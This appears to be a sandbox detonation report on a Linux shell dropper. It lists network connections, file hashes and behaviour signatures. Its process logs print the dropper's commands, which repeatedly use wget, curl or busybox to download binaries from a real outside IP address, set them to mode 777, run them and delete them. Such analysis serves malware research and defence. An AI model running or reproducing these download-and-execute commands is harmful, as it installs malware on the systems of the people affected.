[/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/chmod

[chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F

[./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/rm

[rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/usr/bin/wget

[wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/chmod

[chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp

[./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/rm

[rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/usr/bin/wget

[wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/chmod

[chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2

[./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/rm

[rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/usr/bin/wget

[wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-28 01:06

Reported

2024-10-28 01:09

Platform

debian9-mipsel-20240611-en

Max time kernel

67s

Max time network

69s

Command Line

[/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP N/A
N/A /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK N/A
N/A /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 N/A
N/A /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F N/A
N/A /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp N/A
N/A /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 N/A
N/A /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 N/A
N/A /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir N/A
N/A /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C N/A
N/A /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 N/A
N/A /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 N/A
N/A /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD N/A
N/A /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d N/A
N/A /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF N/A
N/A /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD N/A
N/A /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d N/A
N/A /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF N/A
N/A /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP N/A
N/A /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK N/A
N/A /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 N/A
N/A /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir N/A
N/A /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C N/A
N/A /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 N/A
N/A /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 N/A
N/A /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F N/A
N/A /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp N/A
N/A /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 N/A
N/A /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /usr/bin/curl N/A
File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /usr/bin/curl N/A
File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /usr/bin/curl N/A
File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /usr/bin/curl N/A
File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /usr/bin/curl N/A
File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /usr/bin/curl N/A
File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /usr/bin/curl N/A
File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /usr/bin/curl N/A
File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /usr/bin/curl N/A
File opened for modification /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /usr/bin/curl N/A
File opened for modification /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /usr/bin/curl N/A
File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /usr/bin/curl N/A
File opened for modification /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /usr/bin/curl N/A
File opened for modification /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /usr/bin/curl N/A
File opened for modification /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /usr/bin/curl N/A
File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /usr/bin/curl N/A
File opened for modification /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /usr/bin/curl N/A
File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /usr/bin/curl N/A
File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /usr/bin/curl N/A
File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /usr/bin/curl N/A
File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /usr/bin/curl N/A
File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /usr/bin/curl N/A
File opened for modification /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /usr/bin/curl N/A
File opened for modification /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /usr/bin/curl N/A
File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /usr/bin/curl N/A
File opened for modification /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /usr/bin/curl N/A
File opened for modification /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /usr/bin/curl N/A
File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /usr/bin/curl N/A

Processes

/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh

[/tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/chmod

[chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP

[./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/bin/rm

[rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP]

/usr/bin/wget

[wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/chmod

[chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK

[./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/bin/rm

[rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK]

/usr/bin/wget

[wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/chmod

[chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4

[./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/bin/rm

[rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4]

/usr/bin/wget

[wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/chmod

[chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F

[./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/bin/rm

[rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F]

/usr/bin/wget

[wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/chmod

[chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp

[./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/bin/rm

[rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp]

/usr/bin/wget

[wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/chmod

[chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2

[./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/bin/rm

[rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2]

/usr/bin/wget

[wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/chmod

[chmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3

[./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/bin/rm

[rm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3]

/usr/bin/wget

[wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/chmod

[chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir

[./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/bin/rm

[rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir]

/usr/bin/wget

[wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/chmod

[chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C

[./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/bin/rm

[rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C]

/usr/bin/wget

[wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/chmod

[chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7

[./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/rm

[rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/usr/bin/wget

[wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/chmod

[chmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8

[./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/bin/rm

[rm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

/usr/bin/wget

[wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/chmod

[chmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD

[./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/rm

[rm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/usr/bin/wget

[wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/chmod

[chmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d

[./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/rm

[rm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/usr/bin/wget

[wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/chmod

[chmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF

[./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/bin/rm

[rm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/usr/bin/wget

[wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/chmod

[chmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD

[./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/bin/rm

[rm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD]

/usr/bin/wget

[wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/chmod

[chmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d

[./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/bin/rm

[rm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d]

/usr/bin/wget

[wget http://87.120.126.196/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF]

/usr/bin/curl

